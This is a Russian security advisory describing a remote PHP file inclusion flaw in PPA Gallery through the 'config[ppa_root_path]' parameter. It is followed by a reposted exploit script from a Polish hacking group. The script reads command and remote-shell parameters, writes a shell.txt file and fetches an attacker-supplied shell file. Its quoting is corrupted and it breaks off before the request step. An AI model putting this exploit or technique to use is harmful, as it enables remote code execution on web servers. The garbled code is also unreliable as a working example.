Программа: Skrypty PPA Gallery 0.5.6, возможно другие версии.
Опасность: Высокая
Наличие эксплоита: Да
Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «config[ppa_root_path]» в сценарии inc/functions.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция «register_globals» должна быть включена в конфигурационном файле PHP.
Решение: Способов устранения уязвимости не существует в настоящее время.
Эксплоит:
-----------------------------------------------------------------------
: : : : :
:+: :+: :+: :+: :+: :+: :+:
+:+ +:+ +:+ +:+ +:+ +:+ +:+
+#+ +:+ +#++:++# +#+ +:+ +#+ +#+
+#+ +#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+#+#+# #+# #+#
######### ########## ### ########### ##########
: :
:+: :+: :+: :+: +:+:+: :+:+:+
+:+ +:+ +:+ +:+ +:+ +:+:+ +:+
+#+ +#++:++# +#++:++#++: +#+ +:+ +#+
+#+ +#+ +#+ +#+ +#+ +#+
#+# #+# #+# #+# #+# #+#
### ########## ### ### ### ###
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— — - [DEVIL TEAM THE BEST POLISH TEAM] — -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— PPA Gallery <= 1.0 Remote File Include Exploit
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— [Script name: PPA Gallery 1.0
— [Script site: http://www.ppa.baiz.org
— [Download script: http://skrypty.webpc.pl/pobierz.php?id=602
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— Find by: Kacper (a.k.a Rahim)
+
— DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
+
— Contact: kacper1964@yahoo.pl
— or
— http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— Special Greetz: DragonHeart ;-)
— Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
— SkD, nukedclx, Ramzes
-
— Greetz for all users DEVIL TEAM IRC Channel !!
!@ Przyjazni nie da sie zamienic na marne korzysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
— Z Dedykacja dla osoby,
— bez ktorej nie mogl bym zyc…
— K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
$cmd = $_POST["cmd"];
$glowna = $_POST["glowna"];
$shell = $_POST["shell"];
$exp= «
PPA Gallery <= 1.0 Remote File Include Exploit <img style="border: none;" alt="" src="http://comp-info.ru/news/data/emoticons/.gif" /> DEVIL TEAM <img style="border: none;" alt="" src="http://comp-info.ru/news/data/emoticons/.gif" /> The Best Polish Team <img style="border: none;" alt="" src="http://comp-info.ru/news/data/emoticons/.gif" />»
."
«;
if (!isset($_POST['submit']))
{
echo $exp;
}else{
$file = fopen („shell.txt“, „w+“);
fwrite($file, '');
fclose($file);
$file = fopen ($shell, „r“);
if (!$file) {
echo „
Don't Find shell :( Insert in FTP shell.txt.n“;
exit;
}
echo $exp;
while (!feof ($file)) {
$line .= fgets ($file, 1024).»
";
}
$tpos1 = strpos($line, «++BEGIN++»);
$tpos2 = strpos($line, «++END++»);
$tpos1 = $tpos1+strlen(«++BEGIN++»);
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
}
?>
----------------------------------------------------------
